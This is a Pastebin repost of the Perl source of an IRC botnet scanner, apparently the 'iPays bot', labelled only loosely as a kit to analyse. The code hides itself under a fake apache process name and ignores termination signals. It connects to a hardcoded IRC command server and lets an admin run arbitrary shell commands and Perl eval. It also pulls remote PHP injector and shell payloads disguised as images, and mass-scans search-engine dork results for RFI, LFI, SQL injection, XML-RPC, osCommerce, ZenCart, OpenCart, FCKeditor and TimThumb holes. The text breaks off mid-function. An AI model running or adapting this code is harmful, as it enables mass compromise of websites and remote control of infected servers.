Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Analysis of the iPays bot... or rather, the full kit for you to analyse...
- # $injector is HERE --> (add link later, too tired :P)
- # $botshell is HERE --> (add link later, too tired :P)
- # blah look here too apparently theres an edit http://pastebin.com/79QqXkZB
- #!/usr/bin/perl
- ################################################
- use HTTP::Request; #
- use HTTP::Request::Common; #
- use HTTP::Request::Common qw(POST); #
- use LWP::Simple; #
- use LWP 5.53; #
- use LWP::UserAgent; #
- use Socket; #
- use IO::Socket; #
- use IO::Socket::INET; #
- use IO::Select; #
- use MIME::Base64; #
- ################################################
- my $datetime = localtime;
- my $fakeproc = "/usr/sbin/apache3 -k start";
- my $ircserver = "irc.ganyot.us.to";
- my $ircport = "6667";
- my $nickname = "timlopus";
- my $ident = "jems";
- my $channel = "#lopus";
- my $admin = "Susis";
- my $fullname = "Susis IRC Scanner";
- my $nob0dy = "15,1(4@9AspAlt15)";
- my $lfilogo = "15,1(4@9LFI15)";
- my $rfilogo = "15,1(4@9RFI15)";
- my $xmllogo = "15,1(4@9XML15)";
- my $sqllogo = "15,1(4@9SQL15)";
- my $oscologo = "15,1(4@9OSCO15)";
- my $zenlogo = "15,1(4@9ZEN15)";
- my $oplogo = "15,1(4@9OPEN15)";
- my $lokologo = "15,1(4@9LOKO15)";
- my $thumblogo = "15,1(4@9TIMTHUMB15)";
- my $lficmd = '!lfi';
- my $rficmd = '!rfi';
- my $xmlcmd = '!xml';
- my $sqlcmd = '!sql';
- my $oscocmd = '!osco';
- my $zencmd = '!zen';
- my $lokocmd = '!loko';
- my $opcmd = '!op';
- my $thumbcmd = '!thumb';
- my $cmdlfi = '!cmdlfi';
- my $cmdxml = '!cmdxml';
- my $injector = "http://sec.usu.ac.id:8080/images/upload_2.jpg";
- my $botshell = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
- my $botshell2 = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
- my $thumbshell = "http://blogger.com.autoelectricahernandez.com/x.php";
- my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");
- my $uagent = $uagents[rand(scalar(@uagents))];
- my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
- my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
- my $loko_output = ("FCKeditor - Resources Browser");
- my $open_output = ("FCKeditor - Connectors Tests");
- my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
- 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
- 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
- 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
- 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
- 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
- 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
- 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
- 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
- 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
- my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
- 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
- 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
- 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
- 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
- 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
- $SIG{'INT'} = 'IGNORE';
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE';
- $SIG{'PS'} = 'IGNORE';
- $ircserver = "$ARGV[0]" if $ARGV[0];
- $0 = "$fakeproc"."\0" x 16;;
- my $pid = fork;
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
- our %irc_servers;
- our %DCC;
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new();
- sub sendraw {
- if ($#_ == '1') {
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else {
- print $IRC_cur_socket "$_[0]\n";
- }
- }
- sub connector {
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket;
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket);
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
- nick("$mynick");
- my $versi = "9,1[!] 1,15 Maza CreW 9,1 [!]";
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
- sleep (1);}}
- sub parse {
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) {
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
- nick("$mynick".int rand(1));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
- $mynick = $2;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
- sendraw("MODE $mynick +i");
- sendraw("JOIN $channel");
- sleep(2);
- sendraw("PRIVMSG $admin :Hi $admin im here !!!");
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);;
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
- if ($path eq $mynick) {
- if ($msg =~ /^PING (.*)/) {
- sendraw("NOTICE $nick :PING $1");
- }
- if ($msg =~ /^VERSION/) {
- sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
- }
- if ($msg =~ /^TIME/) {
- sendraw("NOTICE $nick :TIME ".$datetime."");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :9,1Fake Process/PID : $fakeproc - $$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$nick);
- }
- if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$nick);
- }
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
- eval "$1";
- }
- ##################################################################### HIT
- if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$path);
- }
- if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$path);
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = "15,1(4@9Help15)";
- &msg("$path","$helplogo 14 #####################9[HELP]14##############################");
- &msg("$path","$helplogo 7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$thumbcmd [bug][dork]|!portscan[ip][port]) )");
- &msg("$path","$helplogo 7 ( $cmdlfi|$cmdxml) [target][cmd] )");
- &msg("$path","$helplogo 7 ( $zencmd | $oscocmd | $lokocmd | $opcmd [dork] ) ");sleep(2);
- &msg("$path","$helplogo 7 ( !about|!engine|!version|!pid )");
- &msg("$path","$helplogo 14 ######################9[END HELP]14#########################");
- }
- if ($msg=~ /^!engine/) {
- my $enginelogo = "15,1(4@9EnginE15)";
- &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
- &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
- &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");
- }
- if ($msg=~ /^!about/) {
- my $aboutlogo = "15,1(4@9About Bot15)";
- &msg("$path","$aboutlogo 9Nob0dy Priv8 Scanner SE v1.2 Coded by Vrs-hCk");
- &msg("$path","$aboutlogo 13CoDeD by c0li ByroeNet");
- &msg("$path","$aboutlogo 7Modified by ipays ByroeNet");
- }
- if ($msg=~ /^!version/) {
- my $versionlogo = "15,1(4@9Version15)";
- &msg("$path","$versionlogo 13 priv8 SE v1.2");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($injector,"SkFOQ09L=")) {
- &msg("$path","15,1(4@9Injector15)13 PHP Shell 9READY!!!");
- } else {
- &msg("$path","15,1(4@9Injector15)13 PHP Shell 4LOST!!!");
- }
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- ¬ice("$nick","9,1Fake Process/PID : 8$fakeproc - $$");
- }
- ##################################################################### RFI SCAN
- if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$rfilogo 9Dork :4 $dork");
- &msg("$path","$rfilogo 13Bugz :4 $bug");
- &msg("$path","$rfilogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,1);
- } else {
- &msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### LFI SCAN
- if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$lfilogo 9Dork :4 $dork");
- &msg("$path","$lfilogo 13Bugz :4 $bug");
- &msg("$path","$lfilogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,2);
- } else {
- &msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### XML SCAN
- if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$xmllogo 9Dork :4 $dork");
- &msg("$path","$xmllogo 13Bugz :4 $bug");
- &msg("$path","$xmllogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,3);
- } else {
- &msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### SQL SCAN
- if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$sqllogo 9Dork :4 $dork");
- &msg("$path","$sqllogo 13Bugz :4 $bug");
- &msg("$path","$sqllogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,4);
- }
- exit;
- }
- }
- ##################################################################### OSCO SCAN
- if ($msg=~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview",$1);
- &msg("$path","$oscologo 9Dork :4 $dork");
- &msg("$path","$oscologo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,5);
- } else {
- &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### OSCO SCAN
- if ($msg=~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- if (&isFound($injector,"SkFOQ09L=")) {
- my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
- &scan_start($path,$bug,$dork,$engine,5);
- } else {
- &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
- }
- }
- exit;
- }
- }
- ##################################################################### LOKO SCAN
- if ($msg=~ /^$lokocmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("filemanager/browser.html",$1);
- &msg("$path","$lokologo 9Dork :4 $dork");
- &msg("$path","$lokologo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,6);
- }
- exit;
- }
- }
- ##################################################################### OPENCART SCAN
- if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$oplogo 9Dork :4 $dork");
- &msg("$path","$oplogo 13Bugz :4 $bug");
- &msg("$path","$oplogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,7);
- }
- exit;
- }
- }
- ##################################################################### ZEN SCAN
- if ($msg=~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
- &msg("$path","$zenlogo 9Dork :4 $dork");
- &msg("$path","$zenlogo 13Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,8);
- }
- exit;
- }
- }
- ##################################################################### ZEN SCAN
- if ($msg=~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/record_company.php",$1);
- &scan_start($path,$bug,$dork,$engine,8);
- }
- exit;
- }
- }
- ##################################################################### TIMTHUMB.PHP SCAN (ADDED)
- if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- waitpid($pid, 0);
- }
- else {
- if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- &msg("$path","$thumblogo 9Dork :4 $dork");
- &msg("$path","$thumblogo 13Bugz :4 $bug");
- &msg("$path","$thumblogo 8Search Engine Loading ...");
- &scan_start($path,$bug,$dork,$engine,9);
- }
- exit;
- }
- }
- #####################################################################
- }
- }
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- &parse("$line");
- } else {
- if ($#lines == 0) {
- &parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- &parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- &parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- #########################################
- sub type () {
- my ($chan,$bug,$dork,$engine,$type) = @_;
- if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
- elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}
- elsif ($type == 3){&xml($chan,$bug,$dork,$engine);}
- elsif ($type == 4){&sql($chan,$bug,$dork,$engine);}
- elsif ($type == 5){&osco($chan,$bug,$dork,$engine);}
- elsif ($type == 6){&loko($chan,$bug,$dork,$engine);}
- elsif ($type == 7){&op($chan,$bug,$dork,$engine);}
- elsif ($type == 8){&zen($chan,$bug,$dork,$engine);}
- elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);}
- }
- sub scan_start() {
- my ($chan,$bug,$dork,$engine,$type) = @_;
- if ($engine =~ /google/i) {
- if (my $pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GooGLe",$type);
- } exit; }
- }
- if ($engine =~ /google2/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GooGle2",$type);
- } exit; }
- }
- if ($engine =~ /bing/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"Bing",$type);
- } exit; }
- }
- if ($engine =~ /altavista/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ALtaViSTa",$type);
- } exit; }
- }
- if ($engine =~ /ask/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"AsK",$type);
- } exit; }
- }
- if ($engine =~ /uol/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"UoL",$type);
- } exit; }
- }
- if ($engine =~ /yahoo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"YahOo",$type);
- } exit; }
- }
- if ($engine =~ /clusty/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"CluSty",$type);
- } exit; }
- }
- if ($engine =~ /gutser/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GutSer",$type);
- } exit; }
- }
- if ($engine =~ /rediff/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ReDiff",$type);
- } exit; }
- }
- if ($engine =~ /virgilio/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"VirgiLio",$type);
- } exit; }
- }
- if ($engine =~ /webde/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"WebDe",$type);
- } exit; }
- }
- if ($engine =~ /exalead/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ExaLead",$type);
- } exit; }
- }
- if ($engine =~ /lycos/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"LyCos",$type);
- } exit; }
- }
- if ($engine =~ /hotbot/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"HotBot",$type);
- } exit; }
- }
- if ($engine =~ /aol/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"AoL",$type);
- } exit; }
- }
- if ($engine =~ /sapo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SaPo",$type);
- } exit; }
- }
- if ($engine =~ /duck/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"DuCk",$type);
- } exit; }
- }
- if ($engine =~ /lygo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"LyGo",$type);
- } exit; }
- }
- if ($engine =~ /yause/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"YauSe",$type);
- } exit; }
- }
- if ($engine =~ /baidu/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"BaiDu",$type);
- } exit; }
- }
- if ($engine =~ /kipot/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"KiPoT",$type);
- } exit; }
- }
- if ($engine =~ /gibla/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GiBLa",$type);
- } exit; }
- }
- if ($engine =~ /black/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"BLacK",$type);
- } exit; }
- }
- if ($engine =~ /onet/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"oNeT",$type);
- } exit; }
- }
- if ($engine =~ /sizuka/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SiZuka",$type);
- } exit; }
- }
- if ($engine =~ /walla/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"WaLLa",$type);
- } exit; }
- }
- if ($engine =~ /demos/i) {
- if ($pid = fork) { waitpid($pid, 0); }
